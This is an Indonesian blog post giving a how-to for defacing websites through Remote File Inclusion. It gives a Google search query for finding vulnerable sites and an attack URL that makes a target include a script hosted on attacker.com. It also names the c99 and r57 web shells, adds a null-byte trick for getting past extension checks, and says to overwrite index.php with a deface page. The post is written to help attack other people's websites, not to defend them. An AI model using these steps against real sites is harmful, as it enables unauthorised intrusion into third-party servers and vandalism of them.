-->
› ›

Cara Deface Menggunakan POC Remote File Inclusion (RFI)

By 1:02 AM Add Comment Edit


BAGAIMANA CARA MENGUBAH SITUS WEB MENGGUNAKAN REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) adalah teknik yang memungkinkan penyerang untuk mengunggah kode atau file berbahaya di situs web atau server. Kerentanan mengeksploitasi jenis pemeriksaan validasi yang berbeda di situs web dan dapat menyebabkan eksekusi kode pada eksekusi server atau kode di situs web. Kali ini, saya akan menulis tutorial sederhana tentang Penyertaan File Jarak Jauh dan pada akhir tutorial, saya kira Anda akan tahu apa itu semua dan mungkin dapat menyebarkan serangan.

RFI adalah kerentanan umum. Semua peretasan situs web tidak persis tentang injeksi SQL. Menggunakan RFI Anda dapat merusak situs web secara harfiah, mendapatkan akses ke server dan memainkan hampir semua hal dengan server. Mengapa itu memberi tanda merah ke situs web, hanya karena itu Anda hanya perlu memiliki akal sehat dan pengetahuan dasar PHP untuk mengeksekusi kode berbahaya. BASH mungkin berguna karena sebagian besar server saat ini di-host di Linux.

JADI, BAGAIMANA CARA MERETAS SITUS WEB ATAU SERVER DENGAN RFI?

Pertama-tama kita perlu mencari situs web RFI yang rentan. Mari kita lihat bagaimana kita dapat menemukannya.

Seperti yang kita ketahui menemukan kerentanan adalah langkah pertama untuk meretas situs web atau server. Jadi, mari kita mulai dan hanya pergi ke Google dan mencari kueri berikut.

inurl: "index.php? page = home"

Di tempat home, Anda juga dapat mencoba beberapa halaman lain seperti produk, galeri,dan lain-lain.

Jika Anda sudah tahu situs web rentan RFI, maka Anda tidak perlu menemukannya melalui Google.

Setelah kami menemukannya, mari kita lanjutkan ke langkah berikutnya. Mari kita lihat kita memiliki situs web RFI berikut yang rentan.

http://target.com/index.php?page=home

Seperti yang Anda lihat, situs web ini menarik dokumen yang disimpan dalam format teks dari server dan menjadikannya sebagai halaman web. Sekarang kita bisa menggunakan fungsi include PHP untuk menarik mereka keluar. Mari kita lihat cara kerjanya.

http://target.com/index.php?page=http://attacker.com/maliciousScript.txt

Saya telah menyertakan URL txt kode berbahaya saya di tempat asal. Anda dapat menggunakan shell apa pun untuk maliciousScript seperti c99, r57 atau lainnya.

Sekarang, jika itu adalah situs web yang benar-benar rentan, maka akan ada 3 hal yang bisa terjadi.

  1. Anda mungkin telah memperhatikan bahwa url terdiri dari "halaman = Home" tidak memiliki ekstensi, tetapi saya telah menyertakan ekstensi di URL saya, maka situs tersebut mungkin memberikan kesalahan seperti 'kegagalan untuk menyertakan maliciousScript.txt', ini mungkin terjadi sebagai situs dapat secara otomatis menambahkan ekstensi .txt ke halaman yang disimpan di server.
  2. Dalam hal ini, secara otomatis menambahkan sesuatu di baris .php maka kita harus menggunakan byte nol '% 00' untuk menghindari kesalahan.
  3. Eksekusi yang sukses.

Ketika kita berhasil melaksanakan kode, kita baik untuk pergi dengan shell. Sekarang kita akan menelusuri shell untuk index.php. Dan akan mengganti file dengan halaman deface kita,


Catatan: Gunakan Mesin Virtual dan pindai pada VirusTotal sebelum mengunduh program apa pun di Mesin Host untuk privasi Anda.

Related Posts

Berlangganan update artikel terbaru via email:

0 Response to "Cara Deface Menggunakan POC Remote File Inclusion (RFI)"

Post a Comment

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel